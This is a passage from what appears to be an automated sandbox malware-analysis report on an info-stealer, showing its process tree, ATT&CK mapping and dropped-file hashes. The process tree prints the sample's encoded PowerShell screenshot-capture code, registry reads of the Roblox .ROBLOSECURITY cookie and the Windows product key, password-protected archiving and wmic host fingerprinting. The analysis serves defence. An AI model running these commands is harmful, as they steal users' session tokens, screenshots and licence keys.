lAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4540
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykplqxmm\ykplqxmm.cmdline"
        5⤵
        
        PID:2956
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CB2.tmp" "c:\Users\Admin\AppData\Local\Temp\ykplqxmm\CSC1A6C36A19E734926A734DAD3BC39849.TMP"
        6⤵
        
        PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1872
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2828
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3448
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\mv3Py.zip" *"
    3⤵
    PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\mv3Py.zip" *
      4⤵
      Executes dropped EXE
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdcadcc40,0x7fffdcadcc4c,0x7fffdcadcc58
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1668,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1656 /prefetch:2
  2⤵
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2060,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:8
  2⤵
  PID:2940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3068 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3076,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3532,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1
  2⤵
  PID:2528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8
  2⤵
  PID:4716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
  2⤵
  PID:704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:8
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:8
  2⤵
  PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5140,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4892,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:2
  2⤵
  PID:984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5040,i,145141100018600205,5916893971346483538,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=872 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3812

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\070c0a28-0980-449f-9c6c-248d413798a5.tmp

Filesize
9KB

MD5
7f445a35f19cc540c7e3390e835c4cbd

SHA1
d83f9f5ec0516ebb4c57997637c5fc2743ec2535

SHA256
347da967605dee98534acd18957e6ce0fbe477deb830a96d506d4c6efb42e841

SHA512
c0645f524041fa890552710129e0a3ec2e24b7c2281351eb754776392c17f12eed2a2ff06f70798960bdd7db3fdee129bcc65b339ab05a69747db463f03c96db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
b7ae08cd2141671b42bfce31f9fadf38

SHA1
b9b0d7f6822e481001fa018dc3a87018fa89309e

SHA256
589e7880f79723c39e49494c3639fa04a4fad255b7c708596baa478d5aed3b57

SHA512
a6611c36ee74bf963dbba0de766957c51448172113e85cf6fdd8282ca52c8e095380f1f3e199b606bf45dbdd8294b1b82398e5d86887eaf33009c212938ab7ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d579ded18b7755a2a90dd7a4000fcfa7

SHA1
803f59bdd74f0166089f6cae1b6bdf3ab8bba1d6

SHA256
d126c31b08f25f5efda0cbe756fe5d1055ea577ed7e35a445c467157cbdeb9ee

SHA512
599d5cb8aaded8d9b498539e7fb76f5fd7e89473ed49c9dffc15a7856288a4bb588e18e5266f2c07e9b83ab8fbb6ea74c8662ecc446d854d9839c7e203ad0255

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
56337018abc8b67dc04c5b4eead7401d

SHA1
8b65dc366957333401cc8ce142d14e8d7d8b121c

SHA256
82774275a13a2077393a26f4af1b3986cdcffdff8f4d1f89f6f41cfefaa2a223

SHA512
67fbd4c743acfe99ceb5b706cde249f065de3773ff3e61d17a2adad57d85865ec680dcde9fe59342d2dd0739945bd6bab4aa38bc0c656977b0988080e178d499

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
0292b9f92a842fc99d180a52c09d5297

SHA1
e916ac9794539c6e871d75ec7e55147e4a4920ee

SHA256
e28de9fca8abc9c8f225e3437ebae63207b518a4f72ce5931a4fb6b3e927db5b

SHA512
75a57c917024ab4c01c8fc0fc50c5ffd4313215082350060411ff6d8899cd4b2ff6aa17c0b64204ac8924765745c3571ba33a4f6328e58d781b90d3bc8107c86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
cd6a7969fde2c60561da6cb814a09c57

SHA1
cc8e6b5e3ce44446e79eb5a31e8599befe233f27

SHA256
37d2267cdeea7fc7f28d96db161483c9c7edc265520f62386494002b3cbbcf36

SHA512
2f9ce2455bce8ddbe28a4490c9382b4ce47e08e7737e700e6e7a22d6e7accab220080ff37658fa2512383beab438ec1d62cab331f7f8ec05196078bd80c8bb66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ef4dae8046d302d9d070ce3e446db535

SHA1
a4b277fa9d3a576e2173cec9fd0a7425b16639d5

SHA256
e89dbe69754c7cb4cc80eb42d2121db3195d1137e33d8412ce6e850555ba9eca

SHA512
34de08375916d7146da1b44de0d9c30b7ea728c87c0ad832737138007087fd6e4d903586e0d2337e58929edd303a4600f78c8804b1999f9c359f82cff299a670

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2f78925f14917b526f17d7643b0283cf

SHA1
